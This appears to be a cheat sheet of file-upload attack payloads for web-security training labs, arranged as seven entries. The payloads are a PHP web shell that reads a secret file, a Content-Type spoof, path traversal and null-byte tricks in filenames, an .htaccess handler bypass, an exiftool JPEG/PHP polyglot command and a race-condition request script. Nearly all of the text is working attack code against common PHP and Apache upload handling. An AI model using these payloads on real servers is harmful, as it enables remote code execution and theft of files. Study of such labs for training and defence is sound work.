##### File Upload – Direct `.php` avatar upload (no validation) ```http Content-Disposition: form-data; name="avatar"; filename="exploit.php" Content-Type: application/x-php <?php echo file_get_contents('/home/carlos/secret'); ?> ``` Context: Raw multipart part in `POST /my-account/avatar` (no filters) Encoding: None – file stored verbatim in `/files/avatars/` Source: [[1. Remote code execution via web shell upload]] --- ##### File Upload – MIME-type spoof (`image/jpeg`) ```http Content-Disposition: form-data; name="avatar"; filename="exploit.php" Content-Type: image/jpeg ← spoofed ``` Context: MIME-restricted uploader; backend trusts `Content-Type` header Encoding: None – only header value spoofed Source: [[2. Web shell upload via Content-Type restriction bypass]] --- ##### File Upload – Path traversal in `filename` ``` filename="..%2fexploit.php" ``` Context: Multipart `filename` parameter; `%2f` decoded to `/` β‡’ file saved one level up (`/files/exploit.php`) Encoding: URL-encoded slash to bypass naΓ―ve `../` stripping Source: [[3. Web shell upload via path traversal]] --- ##### File Upload – Extension blacklist bypass with `.htaccess` **.htaccess payload** ``` AddType application/x-httpd-php .l33t ``` **Follow-up shell** ```http filename="exploit.l33t" <?php echo file_get_contents('/home/carlos/secret'); ?> ``` Context: First upload `.htaccess`, then any file with `.l33t` extension Encoding: Plain text; leverages Apache `AddType` directive Source: [[4. Web shell upload via extension blacklist bypass]] --- ##### File Upload – Null-byte extension obfuscation ``` filename="exploit.php%00.jpg" ``` Context: Filename validated before URL-decode; `%00` β†’ `\x00` truncates `.jpg`, leaves `.php` on disk Encoding: URL-encoded null byte (%00) Source: [[5. Web shell upload via obfuscated file extension]] --- ##### File Upload – JPEG / PHP polyglot (EXIF comment) ```bash exiftool -Comment="<?php echo 'START '.file_get_contents('/home/carlos/secret').' END'; ?>" avatar.jpg -o polyglot.php ``` Context: Real JPEG magic bytes satisfy content inspection; `.php` extension triggers execution Encoding: PHP payload embedded inside EXIF `Comment` field Source: [[6. Remote code execution via polyglot web shell upload]] --- ##### File Upload – TOCTOU race (upload β†’ GET flood) ```python engine.queue(post_shell, gate='race') for _ in range(50): engine.queue(get_shell, gate='race') engine.openGate('race') ``` Context: File is publicly readable after `move_uploaded_file()` but before validation+`unlink()` Encoding: None – relies on timing; multiple GETs hit the tiny window Source: [[7. Web shell upload via race condition]]